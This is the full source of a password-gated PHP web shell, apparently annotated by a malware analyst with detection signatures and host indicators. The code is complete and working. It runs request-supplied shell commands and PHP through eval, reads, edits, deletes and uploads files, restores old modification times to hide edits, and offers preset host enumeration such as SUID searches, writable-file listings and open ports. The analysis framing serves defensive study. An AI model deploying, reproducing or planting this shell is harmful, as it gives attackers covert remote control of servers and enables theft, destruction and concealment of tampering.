- <?php // NOTE(review): password-gated PHP web shell (shell commands, eval, file manager, upload); the comments in this listing are analyst annotations.
- clearstatcache ();
- set_magic_quotes_runtime ( 0 ); // function removed in PHP 7.0; its use points to a sample written for PHP 4/5 hosts
- if (! function_exists ( 'ini_set' )) { // stub so the ini_set() calls below do not fail when function_exists() reports it missing
- function ini_set() {
- return FALSE;
- }
- }
- ini_set ( 'output_buffering', 0 );
- if (@set_time_limit ( 0 ) || ini_set ( 'max_execution_time', 0 )) // attempts to remove the execution time limit; $limit is only displayed in the status row
- $limit = 'not limited';
- else
- $limit = get_cfg_var ( 'max_execution_time' );
- if (isset ( $HTTP_SERVER_VARS ) && ! isset ( $_SERVER )) { // alias the pre-superglobal $HTTP_*_VARS arrays when $_SERVER is not set
- $_POST = &$HTTP_POST_VARS;
- $_GET = &$HTTP_GET_VARS;
- $_SERVER = &$HTTP_SERVER_VARS;
- }
- if (@get_magic_quotes_gpc ()) { // strip magic-quotes escaping so POST and SERVER values are used as sent
- foreach ( $_POST as $k => $v )
- $_POST [$k] = stripslashes ( $v );
- foreach ( $_SERVER as $k => $v )
- $_SERVER [$k] = stripslashes ( $v );
- }
- if (! isset ( $_GET ['z'] ) || md5 ( $_GET ['z'] ) !== '95e1ebd665d6df61319c938b954f913c') // gate 1: exits with an empty response unless the `z` query parameter hashes to this MD5. Detection: the hash literal is a static signature, and every request that gets past this line carries `z` in the URL, so it shows up in access logs.
- die ();
- function execute($c) { // Runs shell command string $c through the first existing function of exec, shell_exec, system, passthru and returns the captured output; returns FALSE when none of the four exists.
- if (function_exists ( 'exec' )) {
- @exec ( $c, $out ); // $c reaches the shell unmodified; callers in this file pass request data and fixed probe strings
- return @implode ( "\n", $out );
- } elseif (function_exists ( 'shell_exec' )) {
- $out = @shell_exec ( $c );
- return $out;
- } elseif (function_exists ( 'system' )) {
- @ob_start (); // system() prints its output, so it is collected through an output buffer
- @system ( $c, $ret );
- $out = @ob_get_contents ();
- @ob_end_clean ();
- return $out;
- } elseif (function_exists ( 'passthru' )) {
- @ob_start (); // same buffering approach for passthru()
- @passthru ( $c, $ret );
- $out = @ob_get_contents ();
- @ob_end_clean ();
- return $out;
- } else {
- return FALSE; // NOTE(review): reached only when all four functions are reported missing, presumably because the host restricts them (e.g. disable_functions) — the eval path elsewhere in this file does not go through this function
- }
- }
- function read($f) { // Returns the HTML-escaped contents of file $f; falls back to a curl file:// request when file() yields nothing, else to a fixed error string.
- $str = @file ( $f );
- if ($str) {
- $out = implode ( '', $str );
- } elseif (function_exists ( 'curl_version' )) { // also taken for an empty file, because file() then returns an empty array
- @ob_start ();
- $h = @curl_init ( 'file:/' . '/' . $f ); // the scheme is assembled from two pieces, so the literal "file://" never appears in the source; NOTE(review): presumably a second read path for files that file() is refused — confirm against host configuration
- @curl_exec ( $h ); // no CURLOPT_RETURNTRANSFER is set, so the body is printed and picked up from the output buffer
- $out = @ob_get_contents ();
- @ob_end_clean ();
- } else {
- $out = 'Could not read file!';
- }
- return htmlspecialchars ( $out ); // escaped because the caller places the result inside a <textarea>
- }
- function write($f, $c) { // Overwrites file $f with $c, then tries to put back the file's previous modification time; returns a status message string.
- $t = filemtime ( $f ); // mtime recorded before the file is touched
- $fp = @fopen ( $f, 'w' );
- if ($fp) {
- fwrite ( $fp, $c );
- fclose ( $fp );
- $out = 'File saved.' . "\n";
- if ($t && touch ( $f, $t )) { // timestomping: the pre-edit mtime is restored, so mtime-based change review misses the edit; compare content hashes instead, and note that on POSIX filesystems the inode change time (ctime) still reflects the write
- $out .= 'Last modification
- time changed.';
- } else {
- $out .= 'Could not change last modification
- time!';
- }
- } else {
- $out = 'Saving failed!';
- }
- return $out;
- }
- function file_size($f) { // Returns the size of $f as a display string in b, Kb or Mb (rounded to two decimals); values of 1073741824 bytes and above are returned as filesize() gave them, without a unit.
- $size = filesize ( $f );
- if ($size < 1024)
- $size = $size . ' b';
- elseif ($size < 1048576)
- $size = round ( $size / 1024 * 100 ) / 100 . ' Kb';
- elseif ($size < 1073741824)
- $size = round ( $size / 1048576 * 100 ) / 100 . ' Mb';
- return $size;
- }
- $zzz = $_POST ['zzz']; // second credential; compared to an MD5 further down and interpolated into hidden form fields
- if (! function_exists ( 'natcasesort' )) {
- function natcasesort($arr) { // fallback used only when natcasesort is reported missing; $arr is received by value here
- return sort ( $arr );
- }
- }
- if (! empty ( $_POST ['dir'] )) {
- $dir = $_POST ['dir'];
- if (! @chdir ( $dir )) // the working directory comes straight from the request
- $out = 'chdir() failled!';
- }
- $dir = getcwd ();
- (strlen ( $dir ) > 1 && $dir [1] == ':') ? $os_type = 'win' : $os_type = 'nix'; // a colon as second character of the cwd (drive letter) selects the Windows code paths
- if (! $os_name = @php_uname ()) {
- if (function_exists ( 'posix_uname' )) {
- $os_name = posix_uname ();
- } elseif ($os_name != getenv ( 'OS' )) {
- $os_name = '';
- }
- }
- if (function_exists ( 'posix_getpwuid' )) {
- $data = posix_getpwuid ( posix_getuid () ); // account the PHP process runs as; shown in the status row
- $user = $data ['name'] . '
- uid(' . $data ['uid'] . ') gid(' . $data ['gid'] . ')';
- } else {
- $user = '';
- }
- $safe_mode = get_cfg_var ( 'safe_mode' );
- $safe_mode ? $safe = 'on' : $safe = 'off';
- execute ( 'echo ssps' ) ? $execute = 'on' : $execute = 'off'; // capability probe executed on every request that passes the `z` check; a web-server child process running `echo ssps` is a host-level indicator for this sample
- $server = getenv ( 'SERVER_SOFTWARE' );
- if (! $server)
- $server = '---';
- $out = '';
- $tail = '';
- $aliases = '';
- if (! $safe_mode) { // the host enumeration in this branch runs before the `zzz` password is checked
- if ($os_type == 'nix') {
- $os .= execute ( 'sysctl -n kern.ostype' ); // $os is appended to but not printed anywhere in this listing; the commands still run and appear in process telemetry
- $os .= execute ( 'sysctl -n
- kern.osrelease' );
- $os .= execute ( 'sysctl -n kernel.ostype' );
- $os .= execute ( 'sysctl -n kernel.osrelease' );
- if (empty ( $user ))
- $user = execute ( 'id' );
- $aliases = array ('' => '', 'find suid files' => 'find /
- -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm
- -02000 -ls', 'find all writable files in current dir' => 'find . -type f
- -perm -2 -ls', 'find all writable directories in current dir' => 'find .
- -type d -perm -2 -ls', 'find all writable directories and files in
- current dir' => 'find . -perm -2 -ls', 'show opened ports' => 'netstat -an |
- grep -i listen' ); // preset enumeration commands offered in the aliases drop-down
- } else {
- $os_name .= execute ( 'ver' );
- $user .= execute ( 'echo %username%' );
- $aliases = array ('' => '', 'show runing
- services' => 'net start', 'show process list' => 'tasklist' ); // Windows presets for the same drop-down
- }
- }
- print <<<here
- <style>
- table {font:9pt Tahoma;border-color:white}
- input,select,file {background-color:#eeeeee}
- textarea {background-color:#f2f2f2}
- </style>
- <br>
- <center>
- <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
- <tr>
- <td>
- <form method=post>
- <table cellpadding=1 cellspacing=0 border=1 width=650>
- here;
- if (empty ( $zzz ) || md5 ( $zzz ) !== 'a841b9908eac74475729ae0be846d1b6') { // gate 2: POST field `zzz` must hash to this unsalted MD5; otherwise only a single unlabeled text box is rendered. The hash literal is a second static signature for this sample.
- print <<<here
- <tr>
- <td align=center>
- <input type=text name=zzz size=16 value="{$zzz}">
- </td>
- </tr>
- </table>
- here;
- die (); // stops before any action is dispatched; note the submitted $zzz was interpolated into the form above without HTML escaping
- }
- if (! empty ( $_POST ['cmd'] )) { // dispatcher: the first non-empty POST field (cmd, php, edit, save, remove, newdir, newfile, alias) or an uploaded file selects one action; all of it travels in POST bodies, so URL-only logging does not show what was done
- $out = execute ( $_POST ['cmd'] ); // request-supplied string run as a shell command
- }
- elseif (! empty ( $_POST ['php'] )) {
- ob_start ();
- eval ( $_POST ['php'] ); // request-supplied PHP evaluated in-process; does not depend on the exec/shell_exec/system/passthru chain in execute()
- $out = ob_get_contents ();
- ob_end_clean ();
- }
- elseif (! empty ( $_POST ['edit'] )) {
- $file = $_POST ['edit'];
- $out = read ( $file );
- $tail = '<input type=hidden name=dir value="' . $dir . '"><input type=hidden name=efile value="' . $file . '"><br><input type=submit>'; // $dir and $file are concatenated into HTML without escaping
- }
- elseif (! empty ( $_POST ['save'] )) {
- $out = write ( $_POST ['efile'], $_POST ['save'] ); // target path and new content both come from the request; write() restores the old mtime afterwards
- }
- elseif (! empty ( $_POST ['remove'] )) {
- $obj = $_POST ['remove'];
- @is_dir ( $obj ) ? $res = @rmdir ( $obj ) : $res = @unlink ( $obj ); // deletes a request-named directory (rmdir) or file (unlink)
- $res ? $out = 'Removed successfully' : $out = 'Removing failed!';
- }
- elseif (! empty ( $_POST ['newdir'] )) {
- @mkdir ( $_POST ['newdir'] ) ? $out = 'Directory created.' : $out = 'Could not create directory!';
- }
- elseif (! empty ( $_POST ['newfile'] )) {
- @touch ( $_POST ['newfile'] ) ? $out = 'File created.' : $out = 'Could not create file!';
- }
- elseif (! empty ( $_POST ['alias'] )) {
- $out = execute ( $_POST ['alias'] ); // the value is taken from the request, not looked up in $aliases, so any command string is accepted here
- }
- elseif (! empty ( $_FILES ['ufile'] ['tmp_name'] )) {
- if (! is_uploaded_file ( $_FILES ['ufile'] ['tmp_name'] ) || @! copy ( $_FILES ['ufile'] ['tmp_name'], $dir . chr ( 47 ) . $_FILES ['ufile'] ['name'] )) // copies the upload into the current directory under the client-supplied file name; chr ( 47 ) is "/"
- $out = 'Could not upload file';
- else
- $out = 'Uploaded successfully.';
- }
- if (! $safe_mode) // the cmd input row is rendered only when safe_mode is off
- print <<<here
- <tr>
- <td>
- cmd
- </td>
- <td colspan=8 nowrap>
- <input type=text name=cmd size=97>
- <input type=hidden name=zzz value="{$zzz}">
- </td>
- </tr>
- here;
- print <<<here
- <tr>
- <td>
- php
- </td>
- <td colspan=8>
- <input type=text name=php size=97>
- </td>
- </tr>
- <tr>
- <td>
- actions
- </td>
- <td>
- edit
- </td>
- <td>
- <input type=text name=edit size=14>
- </td>
- <td>
- remove
- </td>
- <td>
- <input type=text name=remove size=14>
- </td>
- <td>
- new_dir
- </td>
- <td>
- <input type=text name=newdir size=14>
- </td>
- <td>
- new_file
- </td>
- <td>
- <input type=text name=newfile size=15>
- </td>
- </tr>
- here;
- if ($aliases) { // $aliases is an array only when safe_mode is off; otherwise it stays '' and the row is skipped
- print <<<here
- <tr>
- <td>
- aliases
- </td>
- <td colspan=8>
- <select name=alias>
- here;
- foreach ( $aliases as $k => $v ) {
- print '<option value="' . $v . '">' . $k . '</option>'; // label is the array key, submitted value is the command string itself; neither is HTML-escaped
- }
- print <<<here
- </select>
- <input type=submit>
- </td>
- </tr>
- here;
- }
- print <<<here
- <tr>
- <td>
- dir
- </td>
- <td colspan=8>
- <input type=text value="{$dir}" name=dir size=97>
- </td>
- </tr>
- </form>
- <form method=post enctype=multipart/form-data>
- <tr>
- <td>
- upload
- </td>
- <td colspan=8>
- <input type=file name=ufile size=60> <input type=submit value="Upload">
- <input type=hidden name=dir value="{$dir}">
- <input type=hidden name=zzz value="{$zzz}">
- </td>
- </tr>
- </form>
- </table>
- <table cellpadding=0 cellspacing=0 border=1 width=650>
- <form method=post>
- <tr valign=top>
- <td width=70% bgcolor=#dddddd>
- <b>OS:</b> {$os_name}<br>
- <b>User:</b> {$user}<br>
- <b>Server:</b> {$server}<br>
- <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
- <input type=hidden name=zzz value="{$zzz}">
- </td>
- <td rowspan=2 bgcolor=#dddddd>
- here;
- if ($dp = @openDir ( $dir )) { // split the entries of the current directory into $theDirs and $theFiles
- $cObj = readDir ( $dp );
- while ( $cObj ) {
- if (@is_dir ( $cObj ))
- $theDirs [] = $cObj;
- elseif (@is_file ( $cObj ))
- $theFiles [] = $cObj;
- $cObj = readDir ( $dp );
- }
- closedir ( $dp );
- }
- if (! empty ( $theDirs )) {
- natcasesort ( $theDirs );
- if ($os_type == 'nix') {
- foreach ( $theDirs as $cDir ) {
- $color = 'black'; // colour legend in the listing: red = writable, blue = readable, black = neither
- if (is_writeable ( $cDir )) {
- $color = 'red';
- } elseif (is_readable ( $cDir )) {
- $color = 'blue';
- }
- print "<font color=" . $color . "><" . $cDir . "></font><br>";
- }
- } else {
- foreach ( $theDirs as $cDir ) {
- $tmp = $cDir . '/.ssps_tmp';
- if (@touch ( $tmp )) { // Windows branch tests writability by creating and then deleting `.ssps_tmp` in each directory; file-creation events with that name are a filesystem indicator for this sample
- $color = 'red';
- unlink ( $tmp );
- } elseif (opendir ( $cDir )) {
- closedir ();
- $color = 'blue';
- } else {
- $color = 'black';
- }
- print "<font color=" . $color . "><" . $cDir . "></font><br>";
- }
- }
- } else
- print '<br>open_basedir restriction in effect. Allowed path is ' . get_cfg_var ( 'open_basedir' ); // printed whenever $theDirs is empty, whatever the actual cause
- print '<br>';
- if (! empty ( $theFiles )) {
- natcasesort ( $theFiles );
- print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
- foreach ( $theFiles as $cFile ) {
- $size = file_size ( $cFile );
- if ($fp = @fopen ( $cFile, 'a' )) // red if the file opens in append mode, blue if it only opens read-only, black otherwise
- $color = 'red';
- elseif ($fp = @fopen ( $cFile, 'r' ))
- $color = 'blue';
- else
- $color = 'black';
- @fclose ( $fp );
- print '<tr><td width=100%><font color=' . $color . '>' . $cFile . '</font></td><td align=left>' . $size . '</tr>';
- }
- print '</table>';
- }
- print <<<here
- </td>
- </tr>
- ?>
- <tr valign=top>
- <td align=center>
- <form method=post>
- results:
- <textarea name=save cols=55 rows=15>{$out}</textarea>
- {$tail}
- <input type=hidden name=zzz value="{$zzz}">
- </form>
- </td>
- </tr>
- </table>
- </form>
- </td>
- </tr>
- </table>
- here;
- die (); // end of page; $out (the action result) and $tail were interpolated into the heredoc above, and only read() HTML-escapes what it returns